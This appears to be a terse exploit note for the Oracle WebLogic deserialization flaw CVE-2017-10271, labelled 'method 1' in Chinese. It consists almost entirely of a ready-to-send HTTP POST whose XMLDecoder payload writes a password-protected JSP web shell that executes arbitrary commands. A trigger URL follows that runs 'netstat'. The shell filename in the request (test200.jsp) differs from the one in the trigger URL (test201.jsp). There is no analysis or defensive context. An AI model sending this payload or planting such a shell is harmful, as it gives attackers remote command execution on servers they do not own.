weblogic CVE-2017-10271

方法1:

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Accept: text/html,application/xhtml+xml,*/*
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding:gzip,deflate
Host:127.0.0.1:7002
Content-Type:text/xml
Content-Length: 986

<soapenv:Envelope xmlns:soapenv=”http://schemas.xmlsoap.org/soap/envelope/”>
<soapenv:Header>
<work:WorkContext xmlns:work=”http://bea.com/2004/06/soap/workarea/”>
<java>
<java version=”1.8.0_131″ class=”java.beans.XMLDecoder”>
<object class=”java.io.PrintWriter”> <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test200.jsp</string><void method=”println”> <string><![CDATA[<%if(“test”.equals(request.getParameter(“pwd”))){java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter(“i”)).getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print(“<pre>”); while((a=in.read(b))!=-1){ out.println(new String(b)); } out.print(“</pre>”);}%>]]></string></void><void method=”close”/>
</object>
</java>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>

127.0.0.1/bea_wls_internal/test201.jsp?pwd=test&i=netstat